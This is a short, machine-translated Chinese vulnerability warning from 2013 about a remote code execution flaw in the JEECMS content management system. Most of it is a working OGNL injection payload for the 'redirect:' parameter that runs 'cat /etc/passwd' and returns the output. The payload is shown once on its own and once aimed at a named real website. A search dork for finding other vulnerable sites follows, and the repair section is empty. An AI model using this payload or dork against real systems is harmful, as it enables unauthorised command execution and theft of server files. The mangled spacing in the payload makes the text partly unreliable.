JEECMS website content management system remote code execution vulnerability-vulnerability warning-the black bar safety net

2013-10-24T00:00:00
ID MYHACK58:62201341036
Type myhack58
Reporter 佚名
Modified 2013-10-24T00:00:00

Description

Brief description:

JEECMS website content management system there is a new remote code execution vulnerability

Detailed description:

JEECMS website content management system there is a new remote code execution vulnerability

Test code:? redirect:${%23a%3d%28new%20java. lang. ProcessBuilder%28new%20java. lang. String[]{%27cat%2 7,%2 7/etc/passwd%2 7}%2 9% 2 9. start%2 8% 2 9,%23b%3d%23a. getInputStream%2 8% 2 9,%23c%3dnew%20java. io. InputStreamReader%2 8%23b%2 9,%23d%3dnew%20java. io. BufferedReader%2 8%23c%2 9,%23e%3dnew%20char[5 0 0 0 0],%23d. read%2 8%23e%2 9,%23matt%3d%23context. get%2 8%27com. opensymphony. xwork2. dispatcher. HttpServletResponse%2 7% 2 9,%23matt. getWriter%2 8% 2 9. println%2 8%23e%2 9,%23matt. getWriter%2 8% 2 9. flush%2 8% 2 9,%23matt. getWriter%2 8% 2 9. close%2 8% 2 9}

Vulnerability to prove:

http://www.dlbc.org.cn/login/Jeecms.do?redirect:${%23a%3d%28new%20java. lang. ProcessBuilder%28new%20java. lang. String[]{%27cat%2 7,%2 7/etc/passwd%2 7}%2 9% 2 9. start%2 8% 2 9,%23b%3d%23a. getInputStream%2 8% 2 9,%23c%3dnew%20java. io. InputStreamReader%2 8%23b%2 9,%23d%3dnew%20java. io. BufferedReader%2 8%23c%2 9,%23e%3dnew%20char[5 0 0 0 0],%23d. read%2 8%23e%2 9,%23matt%3d%23context. get%2 8%27com. opensymphony. xwork2. dispatcher. HttpServletResponse%2 7% 2 9,%23matt. getWriter%2 8% 2 9. println%2 8%23e%2 9,%23matt. getWriter%2 8% 2 9. flush%2 8% 2 9,%23matt. getWriter%2 8% 2 9. close%2 8% 2 9}

!

Directly

inurl:Jeecms. do

!

Repair solutions:

Not